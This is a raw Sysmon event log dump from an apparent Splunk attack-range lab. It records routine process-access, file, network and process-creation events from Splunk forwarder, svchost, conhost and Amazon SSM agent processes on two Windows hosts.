11:11:46.942{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296481Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:11:46.942{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296480Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:11:46.942{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296479Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:11:46.942{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296478Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:11:46.942{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000296477Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:11:46.711{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=079FC5EB2FE77F663CCC0B73B1754F8D,SHA256=EA6361B538DBC981850E12E687A485E8CDF72B4379AFF5555DEFDF3B50E0CC90,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220501Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:11:46.587{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4B2509114DB9656C18D4279CE0A482F5,SHA256=0ED2E3640CFB53DF1CA9D1E62A55FF65DE161F5EE2CDBCB63DBE086EE6BA0142,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220500Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:11:46.462{4F8D34B0-F11D-6215-2300-000000003902}2036NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=C796F5788518CF0F57AB5C87207C5D14,SHA256=0CE7095FECB35749AB15D15586D728EDDAEC94009FC3FB4FCEDC790B064FF951,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000220530Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:11:45.896{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51588-false10.0.1.12-8089- 10341000x8000000000000000220529Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:11:47.777{4F8D34B0-1673-6216-EF04-000000003902}23642892C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000220528Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:11:47.637{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=72F58606C432B4AF9CE63E3010B9781F,SHA256=E5DB7C1D96195F7A5C31EA38F4C8F8DAB9E838E70891EACA5972B0BA5E08C382,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296515Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:11:47.717{C8EA50B7-F130-6215-2F00-000000003802}2588NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-03cdc2690a17b3e8a\channels\health\respondent-20220223083251-154MD5=A38EB58E8C6680789F1AEA0022EC0210,SHA256=7B5C3F2ACD9B17C99423AC4BB2B0CFD455B3A71F8C48567BF2A051FF8E6D4921,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000220527Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:11:47.509{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-1673-6216-EF04-000000003902}2364C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220526Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:11:47.509{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220525Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:11:47.509{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220524Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:11:47.509{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220523Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:11:47.509{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220522Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:11:47.509{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220521Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:11:47.509{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220520Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:11:47.509{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220519Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:11:47.509{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220518Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:11:47.509{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220517Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:11:47.509{4F8D34B0-F11B-6215-0500-000000003902}412428C:\Windows\system32\csrss.exe{4F8D34B0-1673-6216-EF04-000000003902}2364C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000220516Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:11:47.509{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-1673-6216-EF04-000000003902}2364C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000220515Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:11:47.510{4F8D34B0-1673-6216-EF04-000000003902}2364C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000220514Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:11:47.009{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-1673-6216-EE04-000000003902}1908C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220513Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:11:47.009{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220512Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:11:47.009{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220511Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:11:47.009{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220510Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:11:47.009{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220509Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 